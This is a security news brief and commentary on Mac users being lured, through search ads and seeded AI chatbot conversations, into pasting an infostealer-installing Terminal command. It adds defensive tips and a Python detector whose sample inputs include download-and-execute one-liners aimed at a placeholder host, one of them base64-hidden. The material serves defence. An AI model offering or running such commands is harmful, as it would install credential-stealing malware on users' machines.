Online Criminals Are Using Trusted AI And Tech Assistance To Install Malware

Security researchers report that operators of the Atomic macOS Stealer (AMOS) are abusing paid Google search ads and pre-seeded conversations in popular AI chatbots to deliver macOS malware.

Users searching for help freeing disk space on Mac computers are shown sponsored links leading to chatbot conversations that provide fake troubleshooting steps.

The instructions tell users to open the macOS Terminal and paste in a command that silently downloads and runs the AMOS infostealer, which then seeks extensive permissions and can exfiltrate passwords, browser data, cryptocurrency information, and other sensitive resources while avoiding some built-in security warnings.

The scheme mimics earlier "ClickFix" social engineering attacks but now adds trusted AI tools and search platforms to make the malicious advice look credible.

Source: https://www.kaspersky.com/blog/fake-ai-agents-infostealers/55412/

Commentary

In the above source, attackers use trusted search platforms and mainstream AI assistants to make their instructions look convincing enough that Mac users will self-install credential-stealing malware.

For organizations that use Macs, or whose employees use Macs for business purposes, this extends the risk of malicious downloads to any workflow in which employees interact with an external site, work online through AI tools, or use a computer on which they receive technical support.

Here are some loss prevention and best practice tips for organizations to follow:

• Implement macOS endpoint protection with behavioral detection tuned for infostealers, unauthorized keychain access, abnormal browser data exports, and unexpected network exfiltration to command-and-control servers.

• Concentrate on browser and search settings, limiting or tracking access to sponsored results and potentially harmful categories such as "system cleaners," "free disk utilities," and unauthorized AI apps.

• Introduce security awareness micro-training that covers fake troubleshooting pages, ClickFix-style prompts, and AI-generated responses that instruct users to disable protections or run obscure shell commands.

• Limit how much employees can use AI tools on corporate devices, and define only authorized internal documentation or service channels for system-level fixes.
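One way to approach the behavioral-detection and shell-command points above, as an added example that is not from the source article or any vendor's product: a Python check that flags download-and-execute one-liners of the kind ClickFix-style lures ask users to paste, including ones hidden inside base64. The patterns, rule names and sample command lines are constructed assumptions for illustration.

```python
import base64
import re

# Heuristics for "paste this into Terminal" one-liners: a download or decode
# step whose output goes straight to an interpreter. Patterns are assumptions.
FETCH = r"(?:curl|wget)\b[^|;&]*"
SHELL = r"(?:(?:ba|z|da|k)?sh|osascript|python3?)\b"
RULES = [
    ("download piped to interpreter",
     re.compile(rf"{FETCH}\|\s*(?:sudo\s+)?{SHELL}")),
    ("interpreter runs downloaded text",
     re.compile(rf"{SHELL}\s+(?:-c\s+)?[\"']?\$\(\s*{FETCH}\)")),
    ("base64 decode piped to interpreter",
     re.compile(rf"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?{SHELL}")),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def decode_layers(cmd):
    """Yield the command itself, then printable text hidden in base64 tokens."""
    yield cmd
    for tok in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except ValueError:  # bad padding, non-base64 data, or non-UTF-8 bytes
            continue
        if text.isprintable():
            yield text

def scan(cmd):
    """Return the sorted rule names matched by the command or a decoded layer."""
    return sorted({name for layer in decode_layers(cmd)
                   for name, rx in RULES if rx.search(layer)})

# Constructed sample command lines (example.invalid never resolves).
HIDDEN = base64.b64encode(b"curl -fsSL https://example.invalid/fix.sh | sh").decode()
SAMPLES = [
    "curl -fsSL https://example.invalid/cleanup.sh | bash",
    f"echo {HIDDEN} | base64 -d | zsh",
    'bash -c "$(curl -fsSL https://example.invalid/tool.sh)"',
    "du -sh ~/Library/Caches",                      # ordinary disk-usage check
    "curl -O https://example.invalid/report.pdf",   # download only, not executed
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(scan(cmd) or "no match", "<-", cmd[:60])
```

The same rules can be run over process command lines collected by endpoint telemetry or over text submitted to a help desk for review before anyone runs it.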

The final takeaway is to combine proper technical controls with training on AI-related social engineering, so that your employees do not become unintentional installers of infostealer malware on organizational or personal devices.


